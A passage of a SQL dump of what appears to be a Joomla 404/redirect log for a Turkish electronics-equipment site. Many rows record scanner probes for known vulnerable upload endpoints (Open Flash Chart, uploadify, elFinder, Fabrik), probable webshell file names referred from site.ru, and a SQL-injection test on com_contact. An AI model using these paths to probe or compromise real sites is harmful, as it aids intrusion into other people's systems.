00:00:00',301),(19240,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:50','0000-00-00 00:00:00',301),(19241,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:50','0000-00-00 00:00:00',301),(19242,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',1,0,'2018-04-03 15:05:50','0000-00-00 00:00:00',301),(19243,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:52','0000-00-00 00:00:00',301),(19244,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:54','0000-00-00 00:00:00',301),(19245,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:56','0000-00-00 00:00:00',301),(19246,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:05:58','0000-00-00 00:00:00',301),(19247,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'','',1,0,'2018-04-03 15:06:00','0000-00-00 00:00:00',301),(19248,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2018-04-03 15:06:02','0000-00-00 00:00:00',301),(19249,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2018-04-03 15:06:04','0000-00-00 00:00:00',301),(19250,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list//inc/upload.php',NULL,'','',1,0,'2018-04-03 15:06:14','0000-00-00 00:00:00',301),(19251,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-04-03 15:06:17','0000-00-00 00:00:00',301),(19252,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2018-04-03 15:06:19','0000-00-00 00:00:00',301),(19253,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2018-04-03 15:06:22','0000-00-00 00:00:00',301),(19254,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component/users?view=registration/index.php?option=com_user&view=register',NULL,'','',1,0,'2018-04-03 16:12:04','0000-00-00 00:00:00',301),(19255,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component/users?view=registration/index.php?option=com_users&view=registration',NULL,'','',1,0,'2018-04-03 16:12:05','0000-00-00 00:00:00',301),(19256,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component/users?view=registration/component/users/?view=registration',NULL,'','',1,0,'2018-04-03 16:12:07','0000-00-00 00:00:00',301),(19257,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,ordering/results,1-5',NULL,'','',7,0,'2018-04-03 23:38:34','0000-00-00 00:00:00',301),(19258,'http://www.3s-technologies.com.tr/en/wp-content/plugins/boxit/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/boxit/upload.php','',1,0,'2018-04-04 03:15:34','0000-00-00 00:00:00',301),(19259,'http://3s-technologies.com.tr/tr/installation/index.php',NULL,'http://3s-technologies.com.tr/tr/installation/index.php','',16,0,'2018-04-04 03:50:27','0000-00-00 00:00:00',301),(19260,'http://3s-technologies.com.tr/tr/xml.php',NULL,'http://site.ru','',83,0,'2018-04-04 04:05:27','0000-00-00 00:00:00',301),(19261,'http://3s-technologies.com.tr/tr/m1.php',NULL,'http://site.ru','',25,0,'2018-04-04 04:06:21','0000-00-00 00:00:00',301),(19262,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/by,product_name/results,1-5?language=tr-tr',NULL,'','',1,0,'2018-04-04 09:46:09','0000-00-00 00:00:00',301),(19263,'http://www.3s-technologies.com.tr/en/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','',1,0,'2018-04-04 10:17:35','0000-00-00 00:00:00',301),(19264,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-04-04 11:29:29','0000-00-00 00:00:00',301),(19265,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,ordering/results,1-10',NULL,'','',2,0,'2018-04-04 23:37:26','0000-00-00 00:00:00',301),(19266,'http://3s-technologies.com.tr/en/?option=com_user&view=register',NULL,'','',8,0,'2018-04-05 03:16:18','0000-00-00 00:00:00',301),(19267,'http://3s-technologies.com.tr/tr/wp-mains.php',NULL,'http://site.ru','',4,0,'2018-04-05 03:39:41','0000-00-00 00:00:00',301),(19268,'http://3s-technologies.com.tr/tr/administrator/logs.php',NULL,'http://site.ru','',1,0,'2018-04-05 04:44:16','0000-00-00 00:00:00',301),(19269,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',1,0,'2018-04-05 07:28:50','0000-00-00 00:00:00',301),(19270,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',1,0,'2018-04-05 09:42:33','0000-00-00 00:00:00',301),(19271,'http://3s-technologies.com.tr/tr/wp-seo.php',NULL,'http://site.ru','',109,0,'2018-04-05 10:01:48','0000-00-00 00:00:00',301),(19272,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku/results,1-20',NULL,'','',5,0,'2018-04-05 11:45:59','0000-00-00 00:00:00',301),(19273,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-5',NULL,'','',4,0,'2018-04-05 12:43:41','0000-00-00 00:00:00',301),(19274,'http://3s-technologies.com.tr/tr/components/com_foxcontact/z.php',NULL,'http://site.ru','',3,0,'2018-04-05 15:19:36','0000-00-00 00:00:00',301),(19275,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-50',NULL,'','',3,0,'2018-04-05 16:23:40','0000-00-00 00:00:00',301),(19276,'http://3s-technologies.com.tr/tr/verygs.php',NULL,'http://site.ru','',3,0,'2018-04-05 17:54:13','0000-00-00 00:00:00',301),(19277,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',6,0,'2018-04-05 19:03:43','0000-00-00 00:00:00',301),(19278,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/results,1-50',NULL,'','',1,0,'2018-04-05 23:09:34','0000-00-00 00:00:00',301),(19279,'http://3s-technologies.com.tr/tr/wp-content/plugins/gallery-plugin/css/stylesheet.css',NULL,'','',1,0,'2018-04-06 08:24:11','0000-00-00 00:00:00',301),(19280,'http://3s-technologies.com.tr/tr/cache/sok.php',NULL,'http://site.ru','',3,0,'2018-04-06 11:12:03','0000-00-00 00:00:00',301),(19281,'http://3s-technologies.com.tr/tr/includes/d.php',NULL,'http://site.ru','',1,0,'2018-04-06 11:41:05','0000-00-00 00:00:00',301),(19282,'http://3s-technologies.com.tr/tr/camilles.php',NULL,'http://site.ru','',4,0,'2018-04-06 11:41:37','0000-00-00 00:00:00',301),(19283,'http://3s-technologies.com.tr/tr/dsfghs.php',NULL,'http://site.ru','',2,0,'2018-04-06 12:37:08','0000-00-00 00:00:00',301),(19284,'http://3s-technologies.com.tr/tr/.smileys/systems.php',NULL,'http://site.ru','',3,0,'2018-04-06 13:04:34','0000-00-00 00:00:00',301),(19285,'http://3s-technologies.com.tr/tr/header_img.php.suspected',NULL,'http://site.ru','',4,0,'2018-04-06 13:04:39','0000-00-00 00:00:00',301),(19286,'http://3s-technologies.com.tr/tr/components/com_foxcontact/idx.php',NULL,'http://site.ru','',2,0,'2018-04-06 13:56:17','0000-00-00 00:00:00',301),(19287,'http://www.3s-technologies.com.tr/tr/https:/www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:31:33','0000-00-00 00:00:00',301),(19288,'http://www.3s-technologies.com.tr/en/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:03','0000-00-00 00:00:00',301),(19289,'http://www.3s-technologies.com.tr/tr/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:09','0000-00-00 00:00:00',301),(19290,'http://www.3s-technologies.com.tr/tr/media/jui/js/).html(n.highlighter(r)),t[0]}),t.first().addclass(',NULL,'','',1,0,'2018-04-07 02:32:12','0000-00-00 00:00:00',301),(19291,'http://www.3s-technologies.com.tr/tr/media/jui/js/)[this.options.html',NULL,'','',1,0,'2018-04-07 02:32:13','0000-00-00 00:00:00',301),(19292,'http://www.3s-technologies.com.tr/tr/media/jui/js/).length,l.html5clone=',NULL,'','',1,0,'2018-04-07 02:32:14','0000-00-00 00:00:00',301),(19293,'http://www.3s-technologies.com.tr/tr/media/jui/js/).length,l.htmlserialize=!!a.getelementsbytagname(',NULL,'','',1,0,'2018-04-07 02:32:14','0000-00-00 00:00:00',301),(19294,'http://www.3s-technologies.com.tr/tr/media/jui/js/,data:b}).done(function(a){f=arguments,g.html(d?n(',NULL,'','',1,0,'2018-04-07 02:32:15','0000-00-00 00:00:00',301),(19295,'http://www.3s-technologies.com.tr/tr/media/jui/js/],_default:l.htmlserialize?[0,',NULL,'','',1,0,'2018-04-07 02:32:16','0000-00-00 00:00:00',301),(19296,'http://www.3s-technologies.com.tr/tr/media/system/js/);e--;)k=k.firstchild;this.empty().adopt(k.childnodes);q||u.removechild(f)}}(element.properties.html.set);b=document.createelement(',NULL,'','',1,0,'2018-04-07 02:32:17','0000-00-00 00:00:00',301),(19297,'http://www.3s-technologies.com.tr/tr/media/system/js/,c.html);c.tree=b.childnodes;c.elements=b.getelements(a.filter||',NULL,'','',1,0,'2018-04-07 02:32:18','0000-00-00 00:00:00',301),(19298,'http://www.3s-technologies.com.tr/tr/media/system/js/,i);b.head=b.html=b.window=null};this.attachevent(',NULL,'','',1,0,'2018-04-07 02:32:18','0000-00-00 00:00:00',301),(19299,'http://www.3s-technologies.com.tr/tr/media/system/js/],function(a){f[a.tolowercase()]=a});f.html=',NULL,'','',1,0,'2018-04-07 02:32:19','0000-00-00 00:00:00',301),(19300,'http://www.3s-technologies.com.tr/tr/media/jui/js/)}else{this.container.html(',NULL,'','',1,0,'2018-04-07 02:32:26','0000-00-00 00:00:00',301),(19301,'http://www.3s-technologies.com.tr/tr/media/jui/js/,container_props);if(this.is_multiple){this.container.html(',NULL,'','',1,0,'2018-04-07 02:32:26','0000-00-00 00:00:00',301),(19302,'http://www.3s-technologies.com.tr/tr/media/jui/js/}).html(',NULL,'','',1,0,'2018-04-07 02:32:27','0000-00-00 00:00:00',301),(19303,'http://www.3s-technologies.com.tr/tr/ana-sayfa/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:37','0000-00-00 00:00:00',301),(19304,'http://www.3s-technologies.com.tr/tr/dalga-lehimleme/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:37','0000-00-00 00:00:00',301),(19305,'http://www.3s-technologies.com.tr/tr/hakkımızda/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:37','0000-00-00 00:00:00',301),(19306,'http://www.3s-technologies.com.tr/tr/iletisim/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:39','0000-00-00 00:00:00',301),(19307,'http://www.3s-technologies.com.tr/tr/kart-ueretim-teknolojileri/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:39','0000-00-00 00:00:00',301),(19308,'http://www.3s-technologies.com.tr/tr/kursunsuz-lehim/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:40','0000-00-00 00:00:00',301),(19309,'http://www.3s-technologies.com.tr/en/about-us/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:41','0000-00-00 00:00:00',301),(19310,'http://www.3s-technologies.com.tr/en/contacts/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:41','0000-00-00 00:00:00',301),(19311,'http://www.3s-technologies.com.tr/en/home-en/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:41','0000-00-00 00:00:00',301),(19312,'http://www.3s-technologies.com.tr/en/lead-free-solder/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:42','0000-00-00 00:00:00',301),(19313,'http://www.3s-technologies.com.tr/en/pcb-productions-methods/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:42','0000-00-00 00:00:00',301),(19314,'http://www.3s-technologies.com.tr/en/wave-soldering/https://www.ledbazaar.net',NULL,'','',1,0,'2018-04-07 02:32:56','0000-00-00 00:00:00',301),(19315,'http://www.3s-technologies.com.tr/tr/media/jui/js/===c?(b.parentnode&&(b.outerhtml=a.outerhtml),l.html5clone&&a.innerhtml&&!n.trim(b.innerhtml)&&(b.innerhtml=a.innerhtml)):',NULL,'','',1,0,'2018-04-07 02:32:57','0000-00-00 00:00:00',301),(19316,'http://3s-technologies.com.tr/en/component/option,com_jambook/itemid,255/task,add',NULL,'','',1,0,'2018-04-07 03:00:05','0000-00-00 00:00:00',301),(19317,'http://3s-technologies.com.tr/en/component/vitabook?new=true',NULL,'','',1,0,'2018-04-07 03:05:40','0000-00-00 00:00:00',301),(19318,'http://3s-technologies.com.tr/tr/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','',2,0,'2018-04-07 07:38:03','0000-00-00 00:00:00',301),(19319,'http://3s-technologies.com.tr/tr/wp-content/themes/drochilli-child/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/drochilli-child/uploadify/uploadify.css','',1,0,'2018-04-07 07:38:03','0000-00-00 00:00:00',301),(19320,'http://3s-technologies.com.tr/en/wp-content/themes/drochilli-child/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/drochilli-child/uploadify/uploadify.css','',1,0,'2018-04-07 10:49:50','0000-00-00 00:00:00',301),(19321,'http://3s-technologies.com.tr/en/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','',2,0,'2018-04-07 10:49:51','0000-00-00 00:00:00',301),(19322,'http://3s-technologies.com.tr/tr/modules/homepageadvertise/uploadimage.php',NULL,'http://3s-technologies.com.tr/tr/modules/homepageadvertise/uploadimage.php','',1,0,'2018-04-07 11:41:23','0000-00-00 00:00:00',301),(19323,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/results,1-5',NULL,'','',4,0,'2018-04-07 11:54:08','0000-00-00 00:00:00',301),(19324,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/results,1-20',NULL,'','',3,0,'2018-04-07 13:36:45','0000-00-00 00:00:00',301),(19325,'http://3s-technologies.com.tr/en/modules/homepageadvertise/uploadimage.php',NULL,'http://3s-technologies.com.tr/modules/homepageadvertise/uploadimage.php','',1,0,'2018-04-07 14:43:29','0000-00-00 00:00:00',301),(19326,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/results,1-10',NULL,'','',4,0,'2018-04-07 16:04:00','0000-00-00 00:00:00',301),(19327,'http://www.3s-technologies.com.tr/en/?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','',1,0,'2018-04-07 16:39:13','0000-00-00 00:00:00',301),(19328,'http://3s-technologies.com.tr/en/component/kide',NULL,'','',2,0,'2018-04-07 17:46:27','0000-00-00 00:00:00',301),(19329,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/results,1-50',NULL,'','',3,0,'2018-04-07 18:14:54','0000-00-00 00:00:00',301),(19330,'http://3s-technologies.com.tr/tr/.well-known/license.php',NULL,'http://site.ru','',2,0,'2018-04-07 18:48:34','0000-00-00 00:00:00',301),(19331,'http://3s-technologies.com.tr/tr/.smileys/bacot.php',NULL,'http://site.ru','',3,0,'2018-04-07 20:58:47','0000-00-00 00:00:00',301),(19332,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/dirdesc/results,1-5',NULL,'','',1,0,'2018-04-08 08:09:24','0000-00-00 00:00:00',301),(19333,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/results,1-5',NULL,'','',4,0,'2018-04-08 08:42:08','0000-00-00 00:00:00',301),(19334,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/results,1-10',NULL,'','',1,0,'2018-04-08 10:53:03','0000-00-00 00:00:00',301),(19335,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/results,1-50',NULL,'','',1,0,'2018-04-08 13:31:14','0000-00-00 00:00:00',301),(19336,'http://3s-technologies.com.tr/tr//xxx.php',NULL,'','',2,0,'2018-04-08 14:34:37','0000-00-00 00:00:00',301),(19337,'http://www.3s-technologies.com.tr/tr/wp-content/themes/u-design/style.css',NULL,'','',2,0,'2018-04-08 17:04:11','0000-00-00 00:00:00',301),(19338,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-50',NULL,'','',2,0,'2018-04-08 21:11:12','0000-00-00 00:00:00',301),(19339,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering/results,1-10',NULL,'','',3,0,'2018-04-08 22:51:11','0000-00-00 00:00:00',301),(19340,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,6-55',NULL,'','',7,0,'2018-04-09 00:09:06','0000-00-00 00:00:00',301),(19341,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2018-04-09 00:51:11','0000-00-00 00:00:00',301),(19342,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',4,0,'2018-04-09 02:11:10','0000-00-00 00:00:00',301),(19343,'http://3s-technologies.com.tr/tr/?option=com_jambook&task=add',NULL,'http://3s-technologies.com.tr/tr/?option=com_jambook&task=add','',2,0,'2018-04-09 02:55:45','0000-00-00 00:00:00',301),(19344,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-04-09 04:46:10','0000-00-00 00:00:00',301),(19345,'http://www.3s-technologies.com.tr/en/wp-content/plugins/omni-secure-files/plupload/examples/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/omni-secure-files/plupload/examples/upload.php','',1,0,'2018-04-09 04:52:47','0000-00-00 00:00:00',301),(19346,'http://www.3s-technologies.com.tr/tr/:8880/get_password.php',NULL,'','',2,0,'2018-04-09 05:12:41','0000-00-00 00:00:00',301),(19347,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-5',NULL,'','',6,0,'2018-04-09 07:57:49','0000-00-00 00:00:00',301),(19348,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-50',NULL,'','',5,0,'2018-04-09 10:24:29','0000-00-00 00:00:00',301),(19349,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-5',NULL,'','',2,0,'2018-04-09 12:11:09','0000-00-00 00:00:00',301),(19350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',4,0,'2018-04-09 15:23:18','0000-00-00 00:00:00',301),(19351,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/results,1-5',NULL,'','',5,0,'2018-04-09 16:33:53','0000-00-00 00:00:00',301),(19352,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',2,0,'2018-04-09 18:40:56','0000-00-00 00:00:00',301),(19353,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',1,0,'2018-04-09 19:58:34','0000-00-00 00:00:00',301),(19354,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/results,1-10',NULL,'','',5,0,'2018-04-09 20:39:50','0000-00-00 00:00:00',301),(19355,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/results,1-50',NULL,'','',5,0,'2018-04-10 00:32:47','0000-00-00 00:00:00',301),(19356,'http://www.3s-technologies.com.tr/en/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php','',1,0,'2018-04-10 03:23:34','0000-00-00 00:00:00',301),(19357,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-powerplaygallery/js/swfupload/js/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-powerplaygallery//js/swfupload/js/upload.php','',1,0,'2018-04-10 07:28:40','0000-00-00 00:00:00',301),(19358,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php','',3,0,'2018-04-10 13:34:55','0000-00-00 00:00:00',301),(19359,'http://3s-technologies.com.tr/en/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php','',3,0,'2018-04-10 16:30:49','0000-00-00 00:00:00',301),(19360,'http://3s-technologies.com.tr/tr/component/vitabook?new=true',NULL,'http://3s-technologies.com.tr/tr/component/vitabook?new=true','',2,0,'2018-04-10 18:33:46','0000-00-00 00:00:00',301),(19361,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_contact\'a=0&view=contact&id=1&itemid=65&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_contact\'A=0&view=contact&id=1&Itemid=65&lang=en','',1,0,'2018-04-10 18:35:24','0000-00-00 00:00:00',301),(19362,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_contact&view=contact\'a=0&id=1&itemid=65&lang=en',NULL,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_contact&view=contact\'A=0&id=1&Itemid=65&lang=en','',1,0,'2018-04-10 18:35:25','0000-00-00 00:00:00',301),(19363,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',2,0,'2018-04-10 20:29:52','0000-00-00 00:00:00',301),(19364,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',8,0,'2018-04-10 21:59:51','0000-00-00 00:00:00',301),(19365,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/src/connectors/php/connector.php',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/src/connectors/php/connector.php','',22,0,'2018-04-11 04:07:09','0000-00-00 00:00:00',301),(19366,'http://3s-technologies.com.tr//administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'http://3s-technologies.com.tr//administrator/components/com_xcloner-backupandrestore/index2.php','',1,0,'2018-04-11 04:33:41','0000-00-00 00:00:00',301),(19367,'http://3s-technologies.com.tr/en/sites/all/libraries/elfinder/src/connectors/php/connector.php',NULL,'http://3s-technologies.com.tr/sites/all/libraries/elfinder/src/connectors/php/connector.php','',1,0,'2018-04-11 07:10:00','0000-00-00 00:00:00',301),(19368,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',4,0,'2018-04-11 09:10:48','0000-00-00 00:00:00',301),(19369,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',1,0,'2018-04-11 09:57:22','0000-00-00 00:00:00',301),(19370,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-5',NULL,'','',3,0,'2018-04-11 10:17:39','0000-00-00 00:00:00',301),(19371,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',232,0,'2018-04-11 11:28:42','0000-00-00 00:00:00',301),(19372,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',3,0,'2018-04-11 12:40:06','0000-00-00 00:00:00',301),(19373,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku',NULL,'','',2,0,'2018-04-11 13:35:49','0000-00-00 00:00:00',301),(19374,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',6,0,'2018-04-11 15:12:50','0000-00-00 00:00:00',301),(19375,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-10',NULL,'','',4,0,'2018-04-11 15:58:19','0000-00-00 00:00:00',301),(19376,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-5',NULL,'','',1,0,'2018-04-11 16:59:31','0000-00-00 00:00:00',301),(19377,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-5',NULL,'','',4,0,'2018-04-11 17:04:29','0000-00-00 00:00:00',301),(19378,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-50',NULL,'','',3,0,'2018-04-11 17:45:09','0000-00-00 00:00:00',301),(19379,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-20',NULL,'','',4,0,'2018-04-11 18:00:30','0000-00-00 00:00:00',301),(19380,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-50',NULL,'','',1,0,'2018-04-11 18:36:08','0000-00-00 00:00:00',301),(19381,'http://3s-technologies.com.tr/tr/index.php?option=com_community&view=frontpage',NULL,'','',2,0,'2018-04-11 18:46:12','0000-00-00 00:00:00',301),(19382,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',1,0,'2018-04-11 19:28:34','0000-00-00 00:00:00',301),(19383,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc',NULL,'','',4,0,'2018-04-11 20:40:34','0000-00-00 00:00:00',301),(19384,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-20',NULL,'','',1,0,'2018-04-11 21:34:34','0000-00-00 00:00:00',301),(19385,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-10',NULL,'','',1,0,'2018-04-11 22:28:34','0000-00-00 00:00:00',301),(19386,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-10',NULL,'','',1,0,'2018-04-11 22:46:34','0000-00-00 